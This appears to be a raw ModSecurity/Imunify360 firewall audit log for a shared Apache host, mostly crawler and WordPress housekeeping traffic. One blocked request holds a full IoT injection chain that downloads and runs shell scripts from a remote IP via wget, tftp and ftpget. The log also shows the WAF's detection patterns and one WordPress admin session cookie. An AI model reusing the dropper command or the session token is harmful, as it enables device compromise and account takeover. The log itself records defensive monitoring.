Server: Apache Engine-Mode: "ENABLED" --bd9a5b61-Z-- --d91d7211-A-- [30/Jun/2025:11:51:15.288250 +0530] aGIs2-QzqxvzwdgFZ0PHsQAAADo 64.130.33.147 54164 192.168.74.40 80 --d91d7211-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F207.167.64.24%2Ftbk.sh%3B%20chmod%20777%20tbk.sh%3B%20sh%20tbk.sh%3B%20tftp%20207.167.64.24%20-c%20get%20tbk1.sh%3B%20chmod%20777%20tbk1.sh%3B%20sh%20tbk1.sh%3B%20tftp%20-r%20tbk2.sh%20-g%20207.167.64.24%3B%20chmod%20777%20tbk2.sh%3B%20sh%20tbk2.sh%3B%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%20207.167.64.24%20tbk1.sh%20tbk1.sh%3B%20sh%20tbk1.sh%3B%20rm%20-rf%20tbk.sh%20tbk1.sh%20tbk2.sh%20tbk1.sh HTTP/1.1 Host: 103.185.74.40:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozila/5.0 Cookie: uid=1 --d91d7211-F-- HTTP/1.1 404 Not Found Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --d91d7211-H-- Message: Match of "pm /wp-cron.php /wp-login.php /contact /index.php" against "REQUEST_FILENAME" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "275"] [id "77316859"] [msg "IM360 WAF: HTTP/1.1 POST request missing Content-Length Header||MVN:REQUEST_FILENAME||RSV:7.05||RS:0||T:APACHE||MV:/device.rsp||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match ";[\\s\\+]?wget\\shttps?:\\/\\/([^\\s\\+])" at ARGS:mdc. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "211"] [id "77142262"] [msg "IM360 WAF: IOT unauthenticated file upload and RCE||RSV:7.05||RS:0||T:APACHE||MVN:ARGS:mdc||MV:cd /tmp; wget http://207.167.64.24/tbk.sh; chmod 777 tbk.sh; sh tbk.sh; tftp 207.167.64.24 -c get tbk1.sh; chmod 777 tbk1.sh; sh tbk1.sh; tftp -r tbk2.sh -g 207.167.64.24; chmod 777 tbk2.sh; sh tbk2.sh; ftpget -v -u anonymous -p anonymous -p 21 207.167.64.24 tbk1.sh tbk1.sh; sh tbk1.sh; rm -rf tbk.sh tbk1.sh tbk2.sh tbk1.sh||"] [severity "CRITICAL"] [tag "service_im360"] Message: Pattern match ";[\\s\\+]?wget\\shttps?:\\/\\/([^\\s\\+])" at ARGS:mdc. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "82"] [id "77142263"] [msg "IM360 WAF: IOT unauthenticated file upload and RCE||RSV:7.05||RS:0||T:APACHE||MVN:ARGS:mdc||MV:cd /tmp; wget http://207.167.64.24/tbk.sh; chmod 777 tbk.sh; sh tbk.sh; tftp 207.167.64.24 -c get tbk1.sh; chmod 777 tbk1.sh; sh tbk1.sh; tftp -r tbk2.sh -g 207.167.64.24; chmod 777 tbk2.sh; sh tbk2.sh; ftpget -v -u anonymous -p anonymous -P 21 207.167.64.24 tbk1.sh tbk1.sh; sh tbk1.sh; rm -rf tbk.sh tbk1.sh tbk2.sh tbk1.sh||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: default-handler Stopwatch: 1751264475269719 18921 (- - -) Stopwatch2: 1751264475269719 18921; combined=14417, p1=290, p2=13750, p3=0, p4=0, p5=377, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --d91d7211-Z-- --61ee5473-A-- [30/Jun/2025:11:51:15.965162 +0530] aGIs2yw0PB_sNO9OrVxz9QAAAAY 20.171.207.232 47916 192.168.74.40 443 --61ee5473-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/https/images/Rajasthan-Travel-Guides/Map-of-Rajasthan.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --61ee5473-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --61ee5473-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/https/images/Rajasthan-Travel-Guides/Map-of-Rajasthan.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/https/images/Rajasthan-Travel-Guides/Map-of-Rajasthan.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-Jaisalmer||"] [severity "DEBUG"] [tag "service_im360"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751265862903130 16057 (- - -) Stopwatch2: 1751265862903130 16057; combined=3634, p1=174, p2=3333, p3=0, p4=0, p5=127, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4943c124-Z-- --6282335d-A-- [30/Jun/2025:12:14:23.948972 +0530] aGIyRRXzu7QJr9bpYcGF9wAAADU 103.185.74.40 54161 192.168.74.40 443 --6282335d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --6282335d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --6282335d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751265861383477 2565939 (- - -) Stopwatch2: 1751265861383477 2565939; combined=3072, p1=108, p2=2815, p3=0, p4=0, p5=149, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --6282335d-Z-- --1b442a58-A-- [30/Jun/2025:12:14:24.171261 +0530] aGIySMj9GW9trW84LQvbUgAAACk 20.171.207.232 46354 192.168.74.40 443 --1b442a58-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/images/Rajasthan-Travel-Guides/aainag/Car-Rentals-Bikaner.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --1b442a58-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --1b442a58-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751265867743255 14351 (- - -) Stopwatch2: 1751265867743255 14351; combined=2960, p1=125, p2=2653, p3=0, p4=0, p5=181, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --0e60f11f-Z-- --45a9cb0d-A-- [30/Jun/2025:12:14:27.837493 +0530] aGIySOWS9w5iL40fG-hOrwAAADQ 103.185.74.40 30307 192.168.74.40 443 --45a9cb0d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --45a9cb0d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --45a9cb0d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751265864155961 3681907 (- - -) Stopwatch2: 1751265864155961 3681907; combined=2074, p1=124, p2=1801, p3=0, p4=0, p5=149, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --45a9cb0d-Z-- --72a98c55-A-- [30/Jun/2025:12:14:28.963272 +0530] aGIyTMj9GW9trW84LQvbVgAAACk 20.171.207.232 46354 192.168.74.40 443 --72a98c55-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/images/Rajasthan-Travel-Guides/images/hotels-Mount-Abu.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --72a98c55-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --72a98c55-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b0f06904-Z-- --246f7876-A-- [30/Jun/2025:12:35:52.455604 +0530] aGI3UOAHVr5WRvZVfZ4PnwAAABE 101.32.208.70 47486 192.168.74.40 80 --246f7876-B-- GET / HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --246f7876-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --246f7876-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751267152449378 6505 (- - -) Stopwatch2: 1751267152449378 6505; combined=3713, p1=111, p2=3308, p3=105, p4=3, p5=186, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --246f7876-Z-- --5249a910-A-- [30/Jun/2025:12:35:53.497940 +0530] aGI3UaaKdORrgXGmAaWrGAAAABg 20.171.207.232 39146 192.168.74.40 443 --5249a910-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/aainag/Rajasthan-Travel-Guides/https/tnc.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --5249a910-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --5249a910-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/aainag/Rajasthan-Travel-Guides/https/tnc.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751267381196525 14756 (- - -) Stopwatch2: 1751267381196525 14756; combined=2872, p1=152, p2=2558, p3=0, p4=0, p5=161, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --09d9e83a-Z-- --12162e50-A-- [30/Jun/2025:12:39:42.123962 +0530] aGI4NT1Xz6pBWehVRQxR7gAAAD8 103.185.74.40 2587 192.168.74.40 443 --12162e50-B-- POST /2024/relite/wp-admin/admin-ajax.php?action=elementor_1_elementor_pro_updater&nonce=230c3aadc8 HTTP/1.1 Host: wpcodex.xyz User-Agent: WordPress/6.8.1; https://wpcodex.xyz/2024/relite Accept: */* Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP Cookie check; wordpress_logged_in_960ef4ad69df7c4138c6955def0d03e6=admin|1752472688|NouczWVVe15makFTa5YMSDr3bMIYKTagoH8CpNdJKxY|0f7f46ddee8a47a3a56bbf58729cd71aa66f0dad49f447e08c2b04e52568c497; wp_lang=en_US; wp-settings-time-1=1751265489; wp-settings-1=libraryContent=browse&editor=html Connection: close Content-Length: 103 Content-Type: application/x-www-form-urlencoded --12162e50-C-- 0%5Bcallback%5D%5B0%5D=ElementorPro%5CCore%5CUpgrade%5CUpgrades&0%5Bcallback%5D%5B1%5D=_on_each_version --12162e50-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Referrer-Policy: strict-origin-when-cross-origin X-Frame-Options: SAMEORIGIN Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Content-Length: 0 Connection: close Content-Type: text/html; 
charset=UTF-8 --12162e50-H-- Message: Pattern match "(?:edit-theme-plugin-file|update|activate|(?:upload|install-(?:plugin|theme)))" at ARGS:action. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/004_i360_vectors.conf"] [line "41"] [id "77316925"] [msg "IM360 WAF: WordPress theme/plugin activity track||File:||SC:/home/brainsto/public_html/2024/relite/wp-admin/admin-ajax.php||Action:||Theme:||Plugin:||User:brainsto||WPU:admin||RSV:7.05||RS:0||T:APACHE||"] [severity "DEBUG"] [tag "wp_core"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751267381331348 793176 (- - -) Stopwatch2: 1751267381331348 793176; combined=8493, p1=261, p2=7473, p3=302, p4=17, p5=440, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --12162e50-Z-- --76faac79-A-- [30/Jun/2025:12:39:42.368402 +0530] aGI4NmRbNiKFRwZlmyR8XQAAAEI 20.171.207.232 43298 192.168.74.40 443 --76faac79-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/Rajasthan-Travel-Guides/images/https/https/tnc.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --76faac79-F-- HTTP/1.1 200 OK -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751272023551218 7763 (- - -) Stopwatch2: 1751272023551218 7763; combined=4678, p1=116, p2=4311, p3=127, p4=3, p5=120, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --75621955-Z-- --dc810e7a-A-- [30/Jun/2025:13:57:05.547499 +0530] aGJKWUIE2yGYrxR8TRkBGwAAAAA 103.185.74.40 63619 192.168.74.40 443 --dc810e7a-B-- POST /wp-cron.php?doing_wp_cron=1751272025.3577830791473388671875 HTTP/1.1 Host: kondaasservice.com User-Agent: WordPress/6.8.1; https://kondaasservice.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --dc810e7a-C-- --dc810e7a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.0.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --dc810e7a-H-- Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:doing_wp_cron=1751272025.3577830791473388671875& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751272025525470 22265 (- - -) Stopwatch2: 1751272025525470 22265; combined=8982, p1=158, p2=7850, p3=293, p4=6, p5=675, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --dc810e7a-Z-- --b666d611-A-- [30/Jun/2025:13:57:06.908670 +0530] aGJKWgR8oXZVTnNmpqLwLgAAACY 156.228.174.171 20969 192.168.74.40 443 --b666d611-B-- GET /timeclock/wp-login.php HTTP/1.1 Host: wpcodex.xyz Accept-Encoding: identity Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Referer: https://wpcodex.xyz/timeclock Connection: close --b666d611-F-- HTTP/1.1 404 Not Found Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 --b666d611-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751273077392413 17554 (- - -) Stopwatch2: 1751273077392413 17554; combined=4404, p1=178, p2=4072, p3=0, p4=0, p5=154, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ee74c03e-Z-- --3b3d8f7d-A-- [30/Jun/2025:14:14:42.423405 +0530] aGJOeTrWg2L-yJPxtymvvAAAACM 103.185.74.40 21742 192.168.74.40 443 --3b3d8f7d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --3b3d8f7d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --3b3d8f7d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751273081228196 1195748 (- - -) Stopwatch2: 1751273081228196 1195748; combined=2149, p1=102, p2=1902, p3=0, p4=0, p5=145, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3b3d8f7d-Z-- --a7854e76-A-- [30/Jun/2025:14:14:43.830907 +0530] aGJOe5cPYMuFx-9_wxZhJgAAAAo 57.141.0.12 35078 192.168.74.40 443 --a7854e76-B-- GET /rajasthan-tours-from-Delhi/rajasthan-tours-from-jaipur/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-jodhpur/Rajasthan-Travel-Guides/images/testimonials/rajasthan-tours-from-jodhpur/index.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --a7854e76-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a7854e76-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751273083813378 17764 (- - -) Stopwatch2: 1751273083813378 17764; combined=4131, p1=275, p2=3707, p3=0, p4=0, p5=149, sr=182, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --a7854e76-Z-- --04ae3409-A-- [30/Jun/2025:14:14:43.912936 +0530] aGJOeoGRhlibaNVt0VzAlQAAABE 103.185.74.40 20121 192.168.74.40 443 --04ae3409-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --04ae3409-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --04ae3409-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751273082634964 1278447 (- - -) Stopwatch2: 1751273082634964 1278447; combined=2337, p1=110, p2=2086, p3=0, p4=0, p5=141, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --04ae3409-Z-- --9e1fc66f-A-- [30/Jun/2025:14:14:43.966575 +0530] aGJOe_X1QnLxqFPMEnt-CQAAAAE 57.141.0.16 33526 192.168.74.40 443 --9e1fc66f-B-- GET /rajasthan-tours-from-Bikaner/Rajasthan-Travel-Guides/rajasthan-tours-from-jodhpur/rajasthan-tours-from-agra/rajasthan-tours-from-delhi/Rajasthan-Travel-Guides/rajasthan-tours-from-jodhpur/rajasthan-tours-from-jaipur/images/testimonials/tempo-traveller-coaches.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --9e1fc66f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --9e1fc66f-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --30951d5b-Z-- --ff3be508-A-- [30/Jun/2025:14:24:55.393114 +0530] aGJQ35pB8igonk2uLqcyxwAAABA 162.62.213.187 40070 192.168.74.40 80 --ff3be508-B-- GET / HTTP/1.1 Host: 103.185.74.40:80 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --ff3be508-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --ff3be508-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751273695387081 6489 (- - -) Stopwatch2: 1751273695387081 6489; combined=3477, p1=119, p2=3170, p3=73, p4=1, p5=113, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ff3be508-Z-- --dc035374-A-- [30/Jun/2025:14:24:56.039689 +0530] aGJQ4GI_MzezRTu-HqyE_AAAABE 20.171.207.232 44986 192.168.74.40 443 --dc035374-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-jaipur/images/aainag/aainag/js/aaina/1/images/testimonials/js/festivals-calendar.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 